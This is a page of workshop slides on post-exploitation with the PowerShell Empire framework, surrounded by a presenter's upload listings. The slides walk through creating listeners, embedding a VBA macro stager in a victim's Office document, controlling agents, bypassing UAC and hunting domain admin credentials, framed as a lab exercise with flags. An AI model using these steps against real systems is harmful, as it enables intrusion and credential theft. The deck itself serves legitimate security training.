Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
 

More from Haydn Johnson

Introduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkIntroduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalk
Haydn Johnson
 
Communication hack fest-2018-final
Communication hack fest-2018-finalCommunication hack fest-2018-final
Communication hack fest-2018-final
Haydn Johnson
 
Kubernetes - security you need to know about it
Kubernetes - security you need to know about itKubernetes - security you need to know about it
Kubernetes - security you need to know about it
Haydn Johnson
 
Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018
Haydn Johnson
 
UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017
Haydn Johnson
 
PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017
Haydn Johnson
 
Phishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonPhishing dc618 haydnjohnson
Phishing dc618 haydnjohnson
Haydn Johnson
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
Haydn Johnson
 
Meterpreter awareness
Meterpreter awarenessMeterpreter awareness
Meterpreter awareness
Haydn Johnson
 
Power sploit persistence walkthrough
Power sploit persistence walkthroughPower sploit persistence walkthrough
Power sploit persistence walkthrough
Haydn Johnson
 

More from Haydn Johnson (10)

Introduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkIntroduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalk
 
Communication hack fest-2018-final
Communication hack fest-2018-finalCommunication hack fest-2018-final
Communication hack fest-2018-final
 
Kubernetes - security you need to know about it
Kubernetes - security you need to know about itKubernetes - security you need to know about it
Kubernetes - security you need to know about it
 
Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018
 
UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017
 
PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017
 
Phishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonPhishing dc618 haydnjohnson
Phishing dc618 haydnjohnson
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
 
Meterpreter awareness
Meterpreter awarenessMeterpreter awareness
Meterpreter awareness
 
Power sploit persistence walkthrough
Power sploit persistence walkthroughPower sploit persistence walkthrough
Power sploit persistence walkthrough
 

Recently uploaded

GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Tatiana Kojar
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
Ivanti
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Jeffrey Haguewood
 
AWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptxAWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptx
HarisZaheer8
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
dbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdfdbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdf
Shinana2
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024
Intelisync
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
Wouter Lemaire
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
fredae14
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
DanBrown980551
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
Tatiana Kojar
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
SitimaJohn
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
Dinusha Kumarasiri
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Zilliz
 

Recently uploaded (20)

GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
 
AWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptxAWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptx
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
dbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdfdbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdf
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 

Empire Work shop

  • 1. @haydnjohnson “Building an Empire” PowerShell Goodness http://www.slideshare.net/harmj0y/building-an-empire-with-powershell 1
  • 2. @haydnjohnson Post Exploitation ● Have gained access a. Via phishing b. Via Exploit c. Via ?? ● Want to know where we are in the network ● Want to know WHO we are ● What PERMISSIONS do we have ● Getting a shell is just the beginning :) 2
  • 3. @haydnjohnson So you have gained access - Now what ● What Box are you on? ○ IP address ○ What platform? ○ Service Pack? ● Normal User or Privileged User? ○ What permissions ○ What can you execute ● What else is out in the Abyss? ○ Network shares ○ Other boxes ○ Where are the domain admins?? 3
  • 4. @haydnjohnson Any other things we might want to know ??? 4
  • 5. @haydnjohnson We want to pilfer - quietly as possible ● As small a footprint as possible ● Use native tools ● A scripting language like bash for windows? ● BATCH any good? 5
  • 6. @haydnjohnson PowerShell - our best friend ● It is native - pretty much guaranteed to be available ● Full .NET access ● Most likely to be whitelisted ● Access to Win32 API ○ Access to Kernel ● Run things in memory! ○ Even assemble binaries For an amazing explanation read: http://www.exploit-monday.com/2012/08/Why-I-Choose-PowerShell.html 6
  • 7. @haydnjohnson Empire comes to the rescue Free open source Power-packed! 7
  • 8. @haydnjohnson Incorporates: ● PowerSploit ● Posh-SecMod ● PowerShell-AD-Recon ● Mimikatz Developers: ● @harmj0y ● @enigma0x3 ● Many others! 8
  • 9. @haydnjohnson References http://www.powershellempire.com/ Peeps to follow: ● https://twitter.com/enigma0x3 ● https://twitter.com/harmj0y ● https://twitter.com/mattifestation ● https://twitter.com/obscuresec ● https://twitter.com/JosephBialek ● https://twitter.com/pyrotek3 ● https://twitter.com/tifkin_ ● https://twitter.com/ben0xa ● https://twitter.com/mwjcomputing ● https://github.com/leechristensen/UnmanagedPowerShell ● https://github.com/PyroTek3/PowerShell-AD-Recon ● https://github.com/darkoperator/Posh-SecMod Many more + 9
  • 10. @haydnjohnson Pocketful of goodies! ● Create Listeners easily ○ PowerShell command straight into CMD ○ VBA for excel Macros ○ Ducky scripts ● Agents (C2 comms) are easy to use ● Modules and more modules! 10
  • 11. @haydnjohnson Listeners Communicates with your agent (the thing that sits on your victim's machine) 11
  • 13. @haydnjohnson Agents ● Are what you tell to do things on your victim's machine! ● Similar to a meterpreter session? More powerful maybe? 13
  • 15. @haydnjohnson Modules ● Numerous scripts with awesomeness ● Run situational awareness scripts ● Run Privilege escalation scripts 15
  • 17. @haydnjohnson No more theory. Let's give this a try. 17
  • 18. @haydnjohnson The plan 1. Install PowerShell Empire 2. Create a listener 3. Execute an Agent on Victim 4. Run modules 5. Escalate to high privileged process as Admin (bypassuac) 6. Look for other shares/boxes to get Domain Admin a. If classes infrastructure has AD 18
  • 19. @haydnjohnson Tutorial to Follow Part 1 - Getting Access https://www.cybrary.it/0p3n/powershell-empire-stagers-1-phishing-office-macro- evading-avs/ ● Covers Installation ● Receiving connection via a VBA Macro 19
  • 20. @haydnjohnson Install Empire Git Clone onto your Linux machine Got Kali? 20
  • 21. @haydnjohnson Create a Listener “listeners” - switch to listeners mode “options” | “info” - view options to configure “set Name Test1” - Set a name for listener “execute” - activates the listener 21
  • 22. @haydnjohnson Create a macro “usestager macro Test” - create macro for the listener named Test “options” - ensure listener is connected “execute” - will create a file with VBA code Add code from Macro into Victims Excel/Word document. Execute file and receive agent If no excel/word use “usestager launcher”, copy and paste into CMD 22
  • 24. @haydnjohnson Tutorial To Follow Part 2 - Controlling your agent https://www.cybrary.it/0p3n/powershell-empire-stagers-2-controlling-victims- machine/ Opened file - should have an agent “agents” - will take you to the listing of agents “interact ABCDEDINDF” - select the agent to interact with. “sysinfo” - gain information about your victim “usemodule” <tab> - gain a list of all the awesomeness 24
  • 25. @haydnjohnson Useful commands ● >Git clone https://github.com/PowerShellEmpire/Empire.git ● >Listeners ○ List & create listeners ● >Usestager launcher ○ Usestager <tab> to see other launchers :) ● >Agents ○ >sysinfo - list system info agent is on ● >usemodule <tab> ● Bypassuac <2nd listener> 25
  • 26. @haydnjohnson Goals Find a flag - you have local admin access, there is a flag on an open share. Find it Get Domain Admin credentials - you may need to ‘hunt’ for a domain admin 26
  • 27. @haydnjohnson Any other fun stuff we can do? Detailed case study: https://enigma0x3.net/2016/01/28/an- empire-case-study/ 27